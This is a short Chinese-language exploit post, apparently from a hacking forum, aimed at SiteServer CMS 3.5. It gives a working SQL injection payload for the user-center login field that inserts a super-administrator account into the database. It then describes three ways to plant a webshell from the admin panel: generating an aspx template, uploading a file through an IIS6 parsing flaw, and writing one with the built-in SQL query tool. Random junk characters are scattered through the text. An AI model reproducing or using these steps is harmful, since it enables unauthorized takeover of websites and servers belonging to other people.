经测试秒杀最新的3.5版* `! f3 o* ?" x+ I: C
stieserver官网:www.siteserver.cn
( f- w& R& ^' O! DEXP:
4 a% F* f: f2 c# w1 n直接访问UserCenter/login.aspx% A* b M& s. L; o) h' `# ]
用户名处输入:' p7 g* |7 E9 `6 o- o
1 g0 v9 r3 P# _4 m! W; u123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);– y0 l9 W2 N3 v4 n! ^
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
* T/ c- p, P% A; m之后再访问后台SiteServer/login.aspx用插入的用户登陆
2 ^$ A0 k* ]- ?& N后台拿webshell的三种方法:) m. R# D' F6 u/ Y1 I/ Z& {8 j
一、
. F. M2 W9 t* |站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
' Y, }+ C/ @1 u二、
( n! l1 `8 L9 w成员权限-》添加用户-》用户名为:1.asp) i2 [& D% L5 j4 H" D- u4 {
http://127.0.0.1/usercenter/
2 o9 b% ^( L5 [8 \# T9 c. g用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
0 ~5 ^% j) r$ H s" @8 d(ps:后台添加用户时不会验证是否含有非法字符)6 l$ C* @/ ~) I& O$ A. E
三、
3 D8 h+ Y- e+ F: v* Y( L. u* h系统工具-》实用工具-》机器参数查看; y: t# y5 S% z( {7 c2 h0 u
可以看到数据库类型、名称,WEB路径% P$ R j! Q( i9 h m1 p; d
系统工具-》数据库工具-》SQL语句查询
, t0 V8 E7 o: x. _9 ?1 D这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |